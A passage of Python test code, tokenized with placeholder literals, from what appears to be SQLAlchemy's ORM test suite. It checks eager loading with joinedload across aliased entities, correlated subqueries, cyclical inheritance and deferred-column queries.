. tables . addresses ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , backref = '<STR_LIT:user>' ) , <EOL> '<STR_LIT>' : relationship ( Order , backref = '<STR_LIT:user>' ) , <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , order_by = items . c . id ) , <EOL> } ) <EOL> mapper ( Item , items , properties = { <EOL> '<STR_LIT>' : relationship ( Keyword , secondary = item_keywords ) <EOL> } ) <EOL> mapper ( Keyword , keywords ) <EOL> def test_two_entities ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . Address ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:2> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , Order ) . filter ( User . id == Order . user_id ) . <EOL> options ( joinedload ( User . addresses ) , joinedload ( Order . items ) ) . <EOL> filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , Order . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:2> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , Order ) . join ( User . orders ) . <EOL> options ( joinedload ( User . addresses ) , joinedload ( Order . items ) ) . <EOL> filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , Order . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> @ testing . exclude ( <EOL> '<STR_LIT>' , '<STR_LIT:>>' , ( <NUM_LIT:0> , ) , "<STR_LIT>" ) <EOL> def test_two_entities_with_joins ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . Address ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> u1 = aliased ( User ) <EOL> o1 = aliased ( Order ) <EOL> eq_ ( <EOL> [ <EOL> ( <EOL> User ( addresses = [ <EOL> Address ( email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( description = '<STR_LIT>' , isopen = <NUM_LIT:0> , <EOL> items = [ <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) ] ) , <EOL> User ( addresses = [ <EOL> Address ( email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( description = '<STR_LIT>' , isopen = <NUM_LIT:1> , <EOL> items = [ <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) ] ) <EOL> ) , <EOL> ( <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> description = '<STR_LIT>' , isopen = <NUM_LIT:0> , items = [ <EOL> Item ( <EOL> description = '<STR_LIT>' ) , Item ( <EOL> description = '<STR_LIT>' ) , Item ( <EOL> description = '<STR_LIT>' ) ] ) , <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> address_id = None , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:0> , <EOL> items = [ <EOL> Item ( <EOL> description = '<STR_LIT>' ) ] ) <EOL> ) , <EOL> ( <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> description = '<STR_LIT>' , isopen = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> description = '<STR_LIT>' ) , Item ( <EOL> description = '<STR_LIT>' ) ] ) , <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> address_id = None , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:0> , <EOL> items = [ <EOL> Item ( <EOL> description = '<STR_LIT>' ) ] ) <EOL> ) , <EOL> ] , <EOL> sess . query ( User , Order , u1 , o1 ) . <EOL> join ( Order , User . orders ) . <EOL> options ( joinedload ( User . addresses ) , <EOL> joinedload ( Order . items ) ) . filter ( User . id == <NUM_LIT:9> ) . <EOL> join ( o1 , u1 . orders ) . <EOL> options ( joinedload ( u1 . addresses ) , <EOL> joinedload ( o1 . items ) ) . filter ( u1 . id == <NUM_LIT:7> ) . <EOL> filter ( Order . id < o1 . id ) . <EOL> order_by ( User . id , Order . id , u1 . id , o1 . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_aliased_entity_one ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . Address ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( <EOL> User ( <EOL> id = <NUM_LIT:9> , addresses = [ <EOL> Address ( <EOL> id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:2> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , oalias ) . filter ( User . id == oalias . user_id ) . <EOL> options ( <EOL> joinedload ( User . addresses ) , <EOL> joinedload ( oalias . items ) ) . filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , oalias . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_aliased_entity_two ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . Address ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( <EOL> User ( <EOL> id = <NUM_LIT:9> , addresses = [ <EOL> Address ( <EOL> id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:2> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , oalias ) . join ( oalias , User . orders ) . <EOL> options ( joinedload ( User . addresses ) , <EOL> joinedload ( oalias . items ) ) . <EOL> filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , oalias . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_aliased_entity_three ( self ) : <EOL> Order , User = ( <EOL> self . classes . Order , <EOL> self . classes . User ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> self . assert_compile ( <EOL> sess . query ( User , oalias ) . join ( User . orders ) . <EOL> options ( joinedload ( oalias . items ) ) . with_labels ( ) . statement , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class SubqueryTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:16> ) ) <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( "<STR_LIT>" ) ) , <EOL> Column ( '<STR_LIT>' , sa . Float ) , <EOL> Column ( '<STR_LIT>' , sa . Float ) , <EOL> ) <EOL> def test_label_anonymizing ( self ) : <EOL> """<STR_LIT>""" <EOL> tags_table , users_table = self . tables . tags_table , self . tables . users_table <EOL> class User ( fixtures . ComparableEntity ) : <EOL> @ property <EOL> def prop_score ( self ) : <EOL> return sum ( [ tag . prop_score for tag in self . tags ] ) <EOL> class Tag ( fixtures . ComparableEntity ) : <EOL> @ property <EOL> def prop_score ( self ) : <EOL> return self . score1 * self . score2 <EOL> for labeled , labelname in [ ( True , '<STR_LIT>' ) , ( True , None ) , <EOL> ( False , None ) ] : <EOL> sa . orm . clear_mappers ( ) <EOL> tag_score = ( tags_table . c . score1 * tags_table . c . score2 ) <EOL> user_score = sa . select ( [ sa . func . sum ( tags_table . c . score1 * <EOL> tags_table . c . score2 ) ] , <EOL> tags_table . c . user_id == users_table . c . id ) <EOL> if labeled : <EOL> tag_score = tag_score . label ( labelname ) <EOL> user_score = user_score . label ( labelname ) <EOL> else : <EOL> user_score = user_score . as_scalar ( ) <EOL> mapper ( Tag , tags_table , properties = { <EOL> '<STR_LIT>' : sa . orm . column_property ( tag_score ) , <EOL> } ) <EOL> mapper ( User , users_table , properties = { <EOL> '<STR_LIT>' : relationship ( Tag , backref = '<STR_LIT:user>' , lazy = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : sa . orm . column_property ( user_score ) , <EOL> } ) <EOL> session = create_session ( ) <EOL> session . add ( User ( name = '<STR_LIT>' , tags = [ Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT> ) , <EOL> Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT:1.0> ) ] ) ) <EOL> session . add ( User ( name = '<STR_LIT:bar>' , tags = [ Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT> ) , <EOL> Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT:1.0> ) , <EOL> Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT> ) ] ) ) <EOL> session . flush ( ) <EOL> session . expunge_all ( ) <EOL> for user in session . query ( User ) . all ( ) : <EOL> eq_ ( user . query_score , user . prop_score ) <EOL> def go ( ) : <EOL> u = session . query ( User ) . filter_by ( name = '<STR_LIT>' ) . one ( ) <EOL> eq_ ( u . query_score , u . prop_score ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> for t in ( tags_table , users_table ) : <EOL> t . delete ( ) . execute ( ) <EOL> class CorrelatedSubqueryTest ( fixtures . MappedTest ) : <EOL> """<STR_LIT>""" <EOL> __requires__ = ( '<STR_LIT>' , ) <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> ) <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:date>' , Date ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> stuff , users = cls . tables . stuff , cls . tables . users <EOL> users . insert ( ) . execute ( <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ) <EOL> stuff . insert ( ) . execute ( <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:15> ) } , <EOL> ) <EOL> def test_labeled_on_date_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , True , False ) <EOL> def test_scalar_on_date_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT>' , True , False ) <EOL> def test_plain_on_date_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , True , False ) <EOL> def test_labeled_on_limitid_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , False , False ) <EOL> def test_scalar_on_limitid_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT>' , False , False ) <EOL> def test_plain_on_limitid_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , False , False ) <EOL> def test_labeled_on_date_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , True , True ) <EOL> def test_scalar_on_date_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT>' , True , True ) <EOL> def test_plain_on_date_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , True , True ) <EOL> def test_labeled_on_limitid_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , False , True ) <EOL> def test_scalar_on_limitid_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT>' , False , True ) <EOL> def test_plain_on_limitid_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , False , True ) <EOL> def _do_test ( self , labeled , ondate , aliasstuff ) : <EOL> stuff , users = self . tables . stuff , self . tables . users <EOL> class User ( fixtures . ComparableEntity ) : <EOL> pass <EOL> class Stuff ( fixtures . ComparableEntity ) : <EOL> pass <EOL> mapper ( Stuff , stuff ) <EOL> if aliasstuff : <EOL> salias = stuff . alias ( ) <EOL> else : <EOL> salias = stuff <EOL> if ondate : <EOL> stuff_view = select ( [ func . max ( salias . c . date ) . label ( '<STR_LIT>' ) ] ) . where ( salias . c . user_id == users . c . id ) . correlate ( users ) <EOL> else : <EOL> stuff_view = select ( [ salias . c . id ] ) . where ( salias . c . user_id == users . c . id ) . correlate ( users ) . order_by ( salias . c . date . desc ( ) ) . limit ( <NUM_LIT:1> ) <EOL> if testing . against ( "<STR_LIT>" ) : <EOL> operator = operators . in_op <EOL> else : <EOL> operator = operators . eq <EOL> if labeled == '<STR_LIT:label>' : <EOL> stuff_view = stuff_view . label ( '<STR_LIT:foo>' ) <EOL> operator = operators . eq <EOL> elif labeled == '<STR_LIT>' : <EOL> stuff_view = stuff_view . as_scalar ( ) <EOL> if ondate : <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Stuff , <EOL> primaryjoin = and_ ( users . c . id == stuff . c . user_id , <EOL> operator ( stuff . c . date , stuff_view ) ) ) <EOL> } ) <EOL> else : <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Stuff , <EOL> primaryjoin = and_ ( users . c . id == stuff . c . user_id , <EOL> operator ( stuff . c . id , stuff_view ) ) ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . order_by ( User . name ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . all ( ) , <EOL> [ <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:2> ) ] ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:4> ) ] ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . order_by ( User . name ) . first ( ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:2> ) ] ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:2> ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . order_by ( User . name ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . first ( ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:2> ) ] ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . filter ( User . id == <NUM_LIT:2> ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . one ( ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:4> ) ] ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> class CyclicalInheritingEagerTestOne ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> def test_basic ( self ) : <EOL> t2 , t1 = self . tables . t2 , self . tables . t1 <EOL> class T ( object ) : <EOL> pass <EOL> class SubT ( T ) : <EOL> pass <EOL> class T2 ( object ) : <EOL> pass <EOL> class SubT2 ( T2 ) : <EOL> pass <EOL> mapper ( T , t1 , polymorphic_on = t1 . c . type , polymorphic_identity = '<STR_LIT>' ) <EOL> mapper ( <EOL> SubT , None , inherits = T , polymorphic_identity = '<STR_LIT>' , <EOL> properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> SubT2 , lazy = '<STR_LIT>' , <EOL> backref = sa . orm . backref ( '<STR_LIT>' , lazy = '<STR_LIT>' ) ) <EOL> } ) <EOL> mapper ( T2 , t2 , polymorphic_on = t2 . c . type , polymorphic_identity = '<STR_LIT>' ) <EOL> mapper ( SubT2 , None , inherits = T2 , polymorphic_identity = '<STR_LIT>' ) <EOL> create_session ( ) . query ( SubT ) . all ( ) <EOL> class CyclicalInheritingEagerTestTwo ( fixtures . DeclarativeMappedTest , <EOL> testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class PersistentObject ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> class Movie ( PersistentObject ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> director_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> title = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Director ( PersistentObject ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> movies = relationship ( "<STR_LIT>" , foreign_keys = Movie . director_id ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> def test_from_subclass ( self ) : <EOL> Director = self . classes . Director <EOL> s = create_session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Director ) . options ( joinedload ( '<STR_LIT:*>' ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_integrate ( self ) : <EOL> Director = self . classes . Director <EOL> Movie = self . classes . Movie <EOL> session = Session ( testing . db ) <EOL> rscott = Director ( name = "<STR_LIT>" ) <EOL> alien = Movie ( title = "<STR_LIT>" ) <EOL> brunner = Movie ( title = "<STR_LIT>" ) <EOL> rscott . movies . append ( brunner ) <EOL> rscott . movies . append ( alien ) <EOL> session . add_all ( [ rscott , alien , brunner ] ) <EOL> session . commit ( ) <EOL> session . close_all ( ) <EOL> self . d = session . query ( Director ) . options ( joinedload ( '<STR_LIT:*>' ) ) . first ( ) <EOL> assert len ( list ( session ) ) == <NUM_LIT:3> <EOL> class CyclicalInheritingEagerTestThree ( fixtures . DeclarativeMappedTest , <EOL> testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> run_create_tables = None <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class PersistentObject ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> __mapper_args__ = { '<STR_LIT>' : "<STR_LIT:*>" } <EOL> class Director ( PersistentObject ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> other_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> other = relationship ( PersistentObject , <EOL> primaryjoin = other_id == PersistentObject . id , <EOL> lazy = False ) <EOL> __mapper_args__ = { "<STR_LIT>" : id == PersistentObject . id } <EOL> def test_gen_query_nodepth ( self ) : <EOL> PersistentObject = self . classes . PersistentObject <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( PersistentObject ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_gen_query_depth ( self ) : <EOL> PersistentObject = self . classes . PersistentObject <EOL> Director = self . classes . Director <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( PersistentObject ) . options ( joinedload ( Director . other ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class EnsureColumnsAddedTest ( <EOL> fixtures . DeclarativeMappedTest , testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> run_create_tables = None <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class Parent ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> arb = Column ( Integer , unique = True ) <EOL> data = Column ( Integer ) <EOL> o2mchild = relationship ( "<STR_LIT>" ) <EOL> m2mchild = relationship ( "<STR_LIT>" , secondary = Table ( <EOL> '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) ) <EOL> class O2MChild ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> parent_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> class M2MChild ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> def test_joinedload_defered_pk_limit_o2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . o2mchild ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_joinedload_defered_pk_limit_m2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . m2mchild ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_joinedload_defered_pk_o2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . o2mchild ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_joinedload_defered_pk_m2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . m2mchild ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class EntityViaMultiplePathTestOne ( fixtures . DeclarativeMappedTest ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class A ( Base ) : <EOL> __tablename__ = '<STR_LIT:a>' <EOL> id = Column ( Integer , 